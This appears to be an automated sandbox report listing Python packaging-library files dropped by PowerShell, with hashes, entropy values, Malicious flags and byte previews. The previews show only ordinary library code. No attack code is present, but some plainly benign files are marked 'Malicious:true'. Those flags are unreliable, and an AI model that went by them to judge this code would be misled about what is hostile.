                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:n7rPGcvm7MQrcCNWtEp58+H15VairxGe8:fPvK2z4hH15VaidGr
                                                                                                                                                                                                                              MD5:134E747607B7B097C85AC0FE251704A3
                                                                                                                                                                                                                              SHA1:152E40120200DD6746E4F967027F7AC0791C1E82
                                                                                                                                                                                                                              SHA-256:D457D74D294BC32E2968F27966D23D76615AD013B38D44BB8B6869F54F6E06A2
                                                                                                                                                                                                                              SHA-512:68E7BD407D9036AA4D5623EE616E3906F1A9CFF01730C4F580D6419B4CEE263F8E47A9A29437484EC0308CE68BD356D5BAA4C0810BD4097DFFF74BA6DA8B40A5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................U.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e...G.d...d.................Z...G.d...d.e.........Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d...e.j ..................d.e.j"............................d.d...d.d...d.d...d.d...d ..e.j ..................d!e.j"............................d"..e.j ..................e.j$..................e.j&..................z...e.j"..................e.j(..................z.............d#d$..d%d&..d'd(..d)d*..d+d,d-d.....Z.d/e.d0<.....G.d1..d2........Z.y.)3.....N)...dataclass)...Dict..Iterator..NoReturn..Optional..Tuple..Union.....)...Specifierc.....................,.....e.Z.d.Z.U.e.e.d.<...e.e.d.<...e.e.d.<...y.)...Token..name..text..positionN)...__name__..__module__..__qualname__..str..__annotations__..int........XC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/packaging/_tokenizer.pyr....r........s..........I....I....Mr....r....c.....................J.......e.Z.d.Z.d.Z.d.e
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10489
                                                                                                                                                                                                                              Entropy (8bit):5.2364809414388045
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:TPDkZ57ekCxQVPFzn6VURhe0UOYJgUlBBCAYqKR9CiZE/R3aJK9R9O3b/1n36u3e:TPwCk1L5dgYqPp3IK9fY/lmRXfb
                                                                                                                                                                                                                              MD5:E2EE46E68778DBC38EE4D1C37ACA5DF5
                                                                                                                                                                                                                              SHA1:5162D109F36F4DB1783F7C56EE2098BE19A9EF9A
                                                                                                                                                                                                                              SHA-256:1C32B1DC85B164450DBE9DD74FC26D7F4D010204FD88EF36E4E2A75DA5B77CE2
                                                                                                                                                                                                                              SHA-512:4BFEBD451F6BC030DD47FB15E1C36EC02DB0035D54D5D6C684B78367A166C56BFA49AFE3404DDD0D94BDAF870FD4DE5F9DD35589BCB9558781CAA021B87700CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf. ........................b.....U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e.e.e.g.e.f.....Z...G.d...d.e.........Z ..G.d...d.e.........Z!..G.d...d.e.........Z"d.e.d.e.f.d...Z#..d*d.e.e.e.....e.e.f.....d.e.e.....d.e.f.d...Z$d...d...e.jJ..................e.jL..................e.jN..................e.jP..................e.jR..................e.jT..................d...Z+e.e.e.f.....e,d.<...d.e.d.e.d.e.d.e.f.d...Z-d.e.d.e.d.e.e.d.f.....f.d ..Z.d!e.d"e.e.e.f.....d.e.f.d#..Z/d$d%d.e.f.d&..Z0d.e.e.e.f.....f.d'..Z1..G.d(..d)........Z2y.)+.....N)...Any..Callable..Dict..List..Optional..Tuple..Union.....)...MarkerAtom..MarkerList..Op..Value..Variable..parse_marker)...ParserSyntaxError)...InvalidSpecifier..Specifier....canonicalize_name)...InvalidMarker..UndefinedComparison..UndefinedEnvironmentName..Marker..default_environmentc...........................e.Z.d.Z.d.Z.y.).r....zE.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26935
                                                                                                                                                                                                                              Entropy (8bit):5.6045487351412415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:tCzNO20Xql+SdRXluTIy+ml+E8j1cdGe1QgJU/SBcyAvZNHUX:I2d+EvnU6mJL0X
                                                                                                                                                                                                                              MD5:F570E707E593850440361B9F0BE60C10
                                                                                                                                                                                                                              SHA1:9EADE1248EDE12DCED1190D43DA93020313D2703
                                                                                                                                                                                                                              SHA-256:4F2FC0300B7ED62A64372D14B8C7258DC01919A44195DC0800897F8A866C0A92
                                                                                                                                                                                                                              SHA-512:0457D236B7E37B744A9952A244CD3EE42C8156C4B913F53F60368F04791FCF06EFC49752B86C0CD3A5157BBC08CB53714FFFA59124D3DA039E5FEC833E01125F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.j0..................d.........Z.e.j4..................d.d...d.k\..r.d.d.l.m.Z.m.Z...n.e.j:..................r.d.d.l.m.Z.m.Z...n...d.d.l.m.Z.m.Z.....e ..e Z ..G.d...d.e#........Z$..G.d...d.e.d...........Z%h.d...Z&h.d...Z'd.h.Z(d.e)d.e.e)....f.d...Z*d.e.e)....d.e.e)e)f.....f.d...Z+d.e.jX..................jZ..................d.e.e.e)f.....d.e)f.d...Z/i.d.d...d d!..d"d#..d$d$..d%d&..d'd(..d)d)..d*d+..d,d,..d-d-..d.d...d/d0..d1d2..d3d3..d4d4..d5d6..d7d8..d.d9d:d;d<d=d>d?d@dAdBdC....Z0e0jc..........................D.....c.i.c.]...\...}.}.|.|.......c.}.}.Z2d.e.e.e)f.....d.e.e%e.e)e.e)....f.....f.....f.dD..Z3..e4........Z5g.dE..Z6e.dE....Z7..e8g.dF..........Z9..G.dG..dHe.e.............Z:..G.dI..dJ........Z;y.#.e.$.r.....G.d...d.........Z...G.d...d.........Z.Y....6w.x.Y.w.#.e!$.r.....G.d...d.e"........Z Y....Hw.x.Y.w.c...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4444
                                                                                                                                                                                                                              Entropy (8bit):5.038970049369924
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:phOlLgFZJOZ5XxwZFZuzGJBFqMoaEzjAcH+A3poWUAjSVOT24h+040OCS8t7Eyfl:pg2S5XCZOzdU/Hcqm345CPO6
                                                                                                                                                                                                                              MD5:6795BAF0689F368D018275B27C54F129
                                                                                                                                                                                                                              SHA1:178E25806248BC56CDDCE355947714AEE6E4C3C3
                                                                                                                                                                                                                              SHA-256:B2C0966745F372D49180CBC6374A40DE751A4ABCBD6698629A4AAFF19D71769C
                                                                                                                                                                                                                              SHA-512:F1203500315FB91A6AB09AEF96288974C4E8864ACE2BC07847549D19DFC674858E3124860588AB15CABF367469F03711BB8B9E9A9339E90A312D86007F5B40CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vfu..............................d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...G.d...d.........Z.y.)......)...Any..Iterator..Optional..Set.....)...parse_requirement)...ParserSyntaxError)...Marker.._normalize_extra_values)...SpecifierSet)...canonicalize_namec...........................e.Z.d.Z.d.Z.y.)...InvalidRequirementzJ. An invalid requirement was found, users should refer to PEP 508.. N)...__name__..__module__..__qualname__..__doc__........ZC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/packaging/requirements.pyr....r........s...........r....r....c.....................j.....e.Z.d.Z.d.Z.d.e.d.d.f.d...Z.d.e.d.e.e.....f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.y.)...Requirementz.Parse a requirement... Parse a given requirement string into its parts, such as name, specifier,. URL, and extras. Raises InvalidRequirement on a badly-formed requirement. string.. .
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39541
                                                                                                                                                                                                                              Entropy (8bit):5.3763684099662346
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:7DIKdthAyxlwhOuhLquaPfqWQIhHK+pdQ743FhCafjuJBGvHWlKCpSow:7DICgyfrbpS4yVp9w
                                                                                                                                                                                                                              MD5:CA989B61CED1843AFFFF08D96D122892
                                                                                                                                                                                                                              SHA1:470BFA988BE793128C73F3E7080C688A2B3E66C0
                                                                                                                                                                                                                              SHA-256:FA11508C47D92C3AA767834A0882C47A85FD1C7F299F583BFD6DEA7C376E76A7
                                                                                                                                                                                                                              SHA-512:777956EACEBD1B39CC2CC76EF9F107273DC4557CC9395A8FE1DBEF5AD501FEA980861E1A26C9A079B04DF9617E8A63E80B4A35C2B889A7A9F273481C10C84481
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vfh..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.f.....Z...e.d.e...........Z.e.e.e.g.e.f.....Z.d.e.d.e.f.d...Z...G.d...d.e.........Z...G.d...d.e.j2............................Z...G.d...d.e.........Z...e.j8..................d.........Z.d.e.d.e.e.....f.d...Z.d.e.e.....d.e.f.d...Z.d.e.d.e.f.d...Z d.e.e.....d.e.e.....d.e.e.e.....e.e.....f.....f.d...Z!..G.d...d.e.........Z"y.).z.... testsetup::.. from packaging.specifiers import Specifier, SpecifierSet, InvalidSpecifier. from packaging.version import Version......N)...Callable..Iterable..Iterator..List..Optional..Tuple..TypeVar..Union.....)...canonicalize_version)...Version..UnparsedVersionVar)...bound..version..returnc.....................<.....t.........|.t.................s.t.........|.........}.|.S...N)...isinstancer....).r....s.... .XC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/packaging/specifiers.py.._coerce_versionr
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21751
                                                                                                                                                                                                                              Entropy (8bit):5.565548050495066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:zSffXQghE8VZa/wk/+kvYlw0hcSvSZJw414wtWurAkN3Tzs7zZ:z+X6/vYlwwcRDtxzTzWZ
                                                                                                                                                                                                                              MD5:C9A6F52D1DFAB66A55EA1D20D523C705
                                                                                                                                                                                                                              SHA1:916DD2F8C2FBE2BCCE8A55422A0825D845E7B104
                                                                                                                                                                                                                              SHA-256:965ED50B709BA2E44670B69C94C571F3B6B5663A7CD0DDB1AE6D99DC71A20C78
                                                                                                                                                                                                                              SHA-512:EED7AB06199CB66C6E8AAB38B9829E93DCE4696208A75CC2F016D74ED9CB63E057153E1B08F5FB00E8439EAE57FC56D27FB3E96781684377776CAF861C96E9F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf.J.............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j...................e.........Z.e.e.....Z.e.e.e.f.....Z.d.d.d.d.d.d...Z.e.e.e.f.....e.d.<.....e.j@..................d.........d.k(..Z!..G.d...d.........Z"d.e.d.e.e"....f.d...Z#d7d.e.d.e$d.e.e.e.d.f.....f.d...Z%d.e.d.e.f.d...Z&d.e.e.....d.e$f.d...Z'd.e.d.e$d.e$f.d...Z(d7d.e.d.e$d.e.e.....f.d ..Z)......d8d.d!..d.e.e.....d.e.e.e.........d"e.e.e.........d.e$d.e.e"....f.d#..Z*d.e.e.....f.d$..Z+......d8d.d!..d%e.e.....d.e.e.e.........d"e.e.e.........d.e$d.e.e"....f.d&..Z,d.e.d.e.e.....f.d'..Z-......d8d.e.e.....d%e.e.....d"e.e.e.........d.e.e"....f.d(..Z.e!f.d)e.d*e$d.e.f.d+..Z/d,e.d-e.d.e.e.....f.d...Z0..d9d,e.e.....d)e.e.....d.e.e.....f.d/..Z1e!f.d*e$d.e.e.....f.d0..Z2d.e.e.....f.d1..Z3d.e.e.....f.d2..Z4d.e.f.d3..Z5d.d!..d.e$d.e.f.d4..Z6d,e.d.e.f.d5..Z7d.d!..d.e$d.e.e"....f.d6..Z8y.):.....N)...EXTENSION_SUFFIXES
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7274
                                                                                                                                                                                                                              Entropy (8bit):5.464897153613583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:F5QUIayYZu5dOzwJk7JGmpqP2jBYatujhl0gaNAIYR+rsQeD4N6hitmnynAJ6O31:F5hIa/obOnJO23AEga3eUEnl6O3alBM
                                                                                                                                                                                                                              MD5:9AAA46ED6EE1B83007555EB916866901
                                                                                                                                                                                                                              SHA1:A9BFDFC1786E207E27D56D8ACB8ADADBF65F35CB
                                                                                                                                                                                                                              SHA-256:DAD6DEF2BC67167CFF1A4932C71A3B814C03D5C563D0B2D39B469042C384FE3A
                                                                                                                                                                                                                              SHA-512:4BD87E3E0F74BBA97BA992E46F5583CAA21398D2D429C85604FBB28EF1A5A2224AA2796FC740B97B7E0EF7217DE0682C9DCC6FC70BCC50B0FD12F61009B9AC40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...e.e.d.....e.e.e.f.....f.....Z...e.d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...e.j*..................d.e.j,..........................Z...e.j*..................d.........Z...e.j*..................d.........Z...e.j*..................d.........Z.d.d...d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.d...d.e.e.e.f.....d.e.d.e.f.d...Z.d.e.d.e.e.e.e.e.e.....f.....f.d...Z.d.e.d.e.e.e.f.....f.d ..Z y.)!.....N)...FrozenSet..NewType..Tuple..Union..cast.....)...Tag..parse_tag)...InvalidVersion..Version....NormalizedNamec...........................e.Z.d.Z.d.Z.y.)...InvalidNamezW. An invalid distribution name; users should refer to the packaging user guide.. N....__name__..__module__..__qualname__..__doc__r..........SC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/packaging/utils.pyr....r....................r....r....c......................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19987
                                                                                                                                                                                                                              Entropy (8bit):5.273747195076322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:FadWD038IxOwEYj7vE4frGekCWwRgPQIBN3HTFUhcqc:FgsIxOwEYj7vzfQCfgJzCyqc
                                                                                                                                                                                                                              MD5:D11400CC3B168C72EA3125EAA110D4FB
                                                                                                                                                                                                                              SHA1:93A6C6668A3B42F01516A60C00C79B8312B2D772
                                                                                                                                                                                                                              SHA-256:E353D201E3B77CDFF5AB2DF011D21102E27554D5E461FB93592BAA235696DFE1
                                                                                                                                                                                                                              SHA-512:5B6753EC13BECCB9D9FCCECA894D9730C25D2D5BACD6D46A6C0C2EADEA4BD1DAE4293C68B8FF08BA3C14FA4736BE93BA54EEEAE71535D34761CD4BDF1CA55A1B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vfl?........................L.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.e.e.e.e.f.....d.f.....Z.e.e.e.e.e.e.f.....f.....Z.e.e.e.e.e.e.e.f.....e.e.e.e.e.f.....f.....f.....d.f.....f.....Z.e.e.e.e.d.f.....e.e.e.e.f.....Z.e.e.e.g.e.f.....Z...G.d...d.e.........Z.d.e.d.d.f.d...Z...G.d...d.e.........Z...G.d...d.........Z.d.Z.e.Z.....G.d...d.e.........Z d.e.e.....d.e.e.e!e.d.f.....d.e.e.e.e.f.........f.d...Z"..e.jF..................d.........Z$d.e.e.....d.e.e.....f.d...Z%d.e.d.e.e.d.f.....d.e.e.e.e.f.........d.e.e.e.e.f.........d.e.e.e.e.f.........d.e.e.....d.e.f.d...Z&y.) zB... testsetup::.. from packaging.version import parse, Version......N)...Any..Callable..NamedTuple..Optional..SupportsInt..Tuple..Union.....)...Infinity..InfinityType..NegativeInfinity..NegativeInfinityType)...VERSION_PATTERN..parse..Version..InvalidVersion.c..........................e.Z.d.Z.U.e.e.d.<...e.e.d.f.....e.d.<...e.e.e.e.f.........e.d.<...e.e.e.e.f..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3266
                                                                                                                                                                                                                              Entropy (8bit):4.630810046396193
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:V2n72lMfusPq8JSzRbWuAdIxvUOdIj18VHnUyKbiPshLKap4nKzSl69XSCezgvql:V27d1PvuAHOej12HUjVKapCKBwcCrJ
                                                                                                                                                                                                                              MD5:8BFA9D7AA566D419F6C8A15E68935499
                                                                                                                                                                                                                              SHA1:34190A771DC51364FC58F05326E0FED1F37EAC61
                                                                                                                                                                                                                              SHA-256:85B98AF0E0FA67B7D8EA1C229C7114703D5BCBB73390688D62EED28671449369
                                                                                                                                                                                                                              SHA-512:B5CAA4A391D731ABFE8953ED83008523F031F5A693C1FFF14837E2FE4E08B9C205A921C22FB076C0EC84CFEA8AEB895111E54F0CDE1940536AD10E4E8F30A972
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".ELF file parser...This provides a class ``ELFFile`` that parses an ELF executable in a similar.interface to ``ZipFile``. Only the read interface is implemented...Based on: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca.ELF header: https://refspecs.linuxfoundation.org/elf/gabi4+/ch4.eheader.html."""..import enum.import os.import struct.from typing import IO, Optional, Tuple...class ELFInvalid(ValueError):. pass...class EIClass(enum.IntEnum):. C32 = 1. C64 = 2...class EIData(enum.IntEnum):. Lsb = 1. Msb = 2...class EMachine(enum.IntEnum):. I386 = 3. S390 = 22. Arm = 40. X8664 = 62. AArc64 = 183...class ELFFile:. """. Representation of an ELF executable.. """.. def __init__(self, f: IO[bytes]) -> None:. self._f = f.. try:. ident = self._read("16B"). except struct.error:. raise ELFInvalid("unable to parse identification"). magic = bytes(ident[:4]). if magic != b"\x7fELF"
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9590
                                                                                                                                                                                                                              Entropy (8bit):4.860134111843074
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:acgWlIIz7n0QlNh/FUBQrgw61QQdEQjvBxRRmPpzvAa3Rx1JFrh2XJFGiaOpj8:aDkn9XtUB80QIEUn6p8mN2XJk
                                                                                                                                                                                                                              MD5:D55168BBF15973AE8A8AF60072F2611A
                                                                                                                                                                                                                              SHA1:9DF3931F2DCEE2DEA28CE4AC102E037889B8F415
                                                                                                                                                                                                                              SHA-256:D6783F4EAC87E3D858EACDD6FF3547CA82486A881B26A6C81758C9D1F01E85CE
                                                                                                                                                                                                                              SHA-512:7836CBF69AA0CF153682EF5415E24AB80189E2154BF742E5D41DD30A087C292052BDE5F2B3E077D10B9C5CC4D21ED6C765551EEB3397BC68BA4266394D8AD2DC
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import collections.import contextlib.import functools.import os.import re.import sys.import warnings.from typing import Dict, Generator, Iterator, NamedTuple, Optional, Sequence, Tuple..from ._elffile import EIClass, EIData, ELFFile, EMachine..EF_ARM_ABIMASK = 0xFF000000.EF_ARM_ABI_VER5 = 0x05000000.EF_ARM_ABI_FLOAT_HARD = 0x00000400...# `os.PathLike` not a generic type until Python 3.9, so sticking with `str`.# as the type for `path` until then..@contextlib.contextmanager.def _parse_elf(path: str) -> Generator[Optional[ELFFile], None, None]:. try:. with open(path, "rb") as f:. yield ELFFile(f). except (OSError, TypeError, ValueError):. yield None...def _is_linux_armhf(executable: str) -> bool:. # hard-float ABI can be detected from the ELF header of the running. # process. # https://static.docs.arm.com/ihi0044/g/aaelf32.pdf. with _parse_elf(executable) as f:. return (. f is not None. and f.capacity == EIClass.C32.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2676
                                                                                                                                                                                                                              Entropy (8bit):4.741525071166023
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:tyy03LQBbaKkTbuRvHpqE9JaMAR01ARjwrsciluajgZQBk81Idz5Sg:syyLgboTCRhsMM0aRjsKjg6k81iz5Sg
                                                                                                                                                                                                                              MD5:530672880A6727EF0350B3FA7FD0DED6
                                                                                                                                                                                                                              SHA1:67C1B57820B6B3C50D7010E26A58F56DC60DC840
                                                                                                                                                                                                                              SHA-256:92098118B1726E9CBCEB4F7E293BF39ADDB30A108F598BE1A790563F8257EDD1
                                                                                                                                                                                                                              SHA-512:A705AC80C87447CD6DA9E3D563F794E834D6E0136DCD39EEE821C1F2C2FFCFD04AA28E48DE9F7D3E02EF25FBB80176024F1CD2A960AC188B00A22AFA513BAA9B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""PEP 656 support...This module implements logic to detect if the currently running Python is.linked against musl, and what musl version is used.."""..import functools.import re.import subprocess.import sys.from typing import Iterator, NamedTuple, Optional, Sequence..from ._elffile import ELFFile...class _MuslVersion(NamedTuple):. major: int. minor: int...def _parse_musl_version(output: str) -> Optional[_MuslVersion]:. lines = [n for n in (n.strip() for n in output.splitlines()) if n]. if len(lines) < 2 or lines[0][:4] != "musl":. return None. m = re.match(r"Version (\d+)\.(\d+)", lines[1]). if not m:. return None. return _MuslVersion(major=int(m.group(1)), minor=int(m.group(2)))...@functools.lru_cache().def _get_musl_version(executable: str) -> Optional[_MuslVersion]:. """Detect currently-running musl runtime version... This is done by checking the specified executable's dynamic linking. information, and invoking the loader to parse its out
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10347
                                                                                                                                                                                                                              Entropy (8bit):4.784920687930715
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:j+R7k4pRv3G7cLylW1cgrN/YYoLDyZ/bUs2jczKVRiMtrs9xgBz3TZpcb:jMg4fvWALyl9wO7s2N7iWnA
                                                                                                                                                                                                                              MD5:2F49E71519707902ED7701EB298C9410
                                                                                                                                                                                                                              SHA1:B8E29C071A659A78DEC629F80DFB3ADEFB1A79BB
                                                                                                                                                                                                                              SHA-256:CE5B050751693118E451D41BE962EAEF138DE76AEE41A77116962C0D75A12DBE
                                                                                                                                                                                                                              SHA-512:3271F610ECBCFCC09747519B6B209AA0740A8F1F29C248E6E53FCAEAC88F6377AECF9F8B25540512138ED25A9A3596F6604C2A0BB5FE6046E946FCDDC4C03B6D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Handwritten parser of dependency specifiers...The docstring for each __parse_* function contains ENBF-inspired grammar representing.the implementation.."""..import ast.from typing import Any, List, NamedTuple, Optional, Tuple, Union..from ._tokenizer import DEFAULT_RULES, Tokenizer...class Node:. def __init__(self, value: str) -> None:. self.value = value.. def __str__(self) -> str:. return self.value.. def __repr__(self) -> str:. return f"<{self.__class__.__name__}('{self}')>".. def serialize(self) -> str:. raise NotImplementedError...class Variable(Node):. def serialize(self) -> str:. return str(self)...class Value(Node):. def serialize(self) -> str:. return f'"{self}"'...class Op(Node):. def serialize(self) -> str:. return str(self)...MarkerVar = Union[Variable, Value].MarkerItem = Tuple[MarkerVar, Op, MarkerVar].# MarkerAtom = Union[MarkerItem, List["MarkerAtom"]].# MarkerList = List[Union["MarkerList", Marker
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1431
                                                                                                                                                                                                                              Entropy (8bit):4.46577747812095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:q9O0opV38RGdZdljm6xXryJVVwY/8sWjm6xXryJV+dGdHU0T7:IDo0MdZdljm6xXrEVCljm6xXrEV+dGd/
                                                                                                                                                                                                                              MD5:DE664FEDC083927D3D084F416190D876
                                                                                                                                                                                                                              SHA1:FE0C3747CF14E696276CB6806C6775503DE002B8
                                                                                                                                                                                                                              SHA-256:AB77953666D62461BF4B40E2B7F4B7028F2A42ACFFE4F6135C500A0597B9CABE
                                                                                                                                                                                                                              SHA-512:CFF19A724FAC387599D98C0A365849078DBCBEA65EFCA1EE445F158268B9241E552212A99E7E0B34394D246E3A06C999A7F1A967F64B2724CA9B623D62996C6F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details....class InfinityType:. def __repr__(self) -> str:. return "Infinity".. def __hash__(self) -> int:. return hash(repr(self)).. def __lt__(self, other: object) -> bool:. return False.. def __le__(self, other: object) -> bool:. return False.. def __eq__(self, other: object) -> bool:. return isinstance(other, self.__class__).. def __gt__(self, other: object) -> bool:. return True.. def __ge__(self, other: object) -> bool:. return True.. def __neg__(self: object) -> "NegativeInfinityType":. return NegativeInfinity...Infinity = InfinityType()...class NegativeInfinityType:. def __repr__(self) -> str:. return "-Infinity".. def __hash__(self) -> int:. return hash(repr(self)).. def __lt__(self, other: object) -> bool:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5292
                                                                                                                                                                                                                              Entropy (8bit):4.541195864996733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:zKp68FN2GGp5xRf5kPFQK2rBDcfOlaw/UXHbTpUtkwsKw6DGRvxxFka:zeujkwrqfOlaDHbayF6DGtxxFJ
                                                                                                                                                                                                                              MD5:B0E4B78EF3C2060DDCF509ACE8CA82DE
                                                                                                                                                                                                                              SHA1:7E894DBA389A70C4E5E3916705B5525788066A62
                                                                                                                                                                                                                              SHA-256:6A50AD6F05E138502614667A050FB0093485A11009DB3FB2B087FBFFF31327F9
                                                                                                                                                                                                                              SHA-512:10F6C8309A2C4261715B6E5E26BECF31252E0964879287E79C62AAF93EED3A5024E5066A62D31DB64D60896AE534D4E10F21B075FEEF548B532F4797FF506766
                                                                                                                                                                                                                              Malicious:false
